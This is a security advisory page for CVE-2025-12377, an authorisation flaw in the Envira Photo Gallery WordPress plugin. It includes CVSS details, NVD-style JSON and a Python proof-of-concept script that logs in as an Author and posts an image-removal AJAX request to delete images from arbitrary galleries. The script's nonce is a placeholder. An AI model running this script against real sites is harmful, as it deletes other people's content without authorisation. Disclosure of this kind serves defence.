Security Vulnerability Report
CVE-2025-12377 CVSS 4.3 MEDIUM

Published: 2025-11-13 12:15:49
Last Modified: 2026-04-15 00:35:42

Description

The Gallery Plugin for WordPress – Envira Photo Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 1.12.0. This makes it possible for authenticated attackers, with Author-level access and above, to perform multiple actions, such as removing images from arbitrary galleries. The vulnerability was partially patched in version 1.12.0.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Envira Photo Gallery (Lite) < 1.12.0
Envira Photo Gallery (Premium) all versions <= 1.12.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-12377 PoC - Envira Photo Gallery Unauthorized Data Modification
# Target: WordPress site with Envira Photo Gallery plugin <= 1.12.0

target_url = "http://target-wordpress-site.com"
session = requests.Session()

# Step 1: Authenticate with Author-level account
login_url = f"{target_url}/wp-login.php"
login_data = {
    "log": "author_username",
    "pwd": "author_password",
    "wp-submit": "Log In",
    "redirect_to": "/wp-admin/"
}
login_response = session.post(login_url, data=login_data)

if "wordpress_logged_in" not in session.cookies.get_dict():
    print("[-] Login failed")
    sys.exit(1)

print("[+] Login successful")

# Step 2: Exploit - Delete images from arbitrary gallery
ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
exploit_data = {
    "action": "envira_gallery_remove_image",
    "gallery_id": "1",  # Target gallery ID
    "image_id": "100",  # Image ID to delete
    "nonce": "attacker_provided_or_bypassed_nonce"
}
response = session.post(ajax_url, data=exploit_data)

if response.status_code == 200:
    print("[+] Exploit sent - Check if image was deleted")
    print(f"[+] Response: {response.text}")
else:
    print("[-] Exploit failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12377", "sourceIdentifier": "[email protected]", "published": "2025-11-13T12:15:48.903", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Gallery Plugin for WordPress – Envira Photo Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 1.12.0. This makes it possible for authenticated attackers, with Author-level access and above, to perform multiple actions, such as removing images from arbitrary galleries. The vulnerability was partially patched in version 1.12.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://drive.google.com/file/d/1AgsJeff1x4pQAFVGmoSwwU75iiH4-H_p/view?usp=sharing", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/envira-gallery-lite/trunk/includes/admin/ajax.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3387243/envira-gallery-lite/trunk/includes/admin/ajax.php?old=3133202&old_path=envira-gallery-lite%2Ftrunk%2Fincludes%2Fadmin%2Fajax.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3394455%40envira-gallery-lite&old=3387243%40envira-gallery-lite&sfp_email=&sfph_mail=", 
"source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-12377/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/69a0d985-cc85-45ba-889d-1ed30d06f9ce?source=cve", "source": "[email protected]"}]}}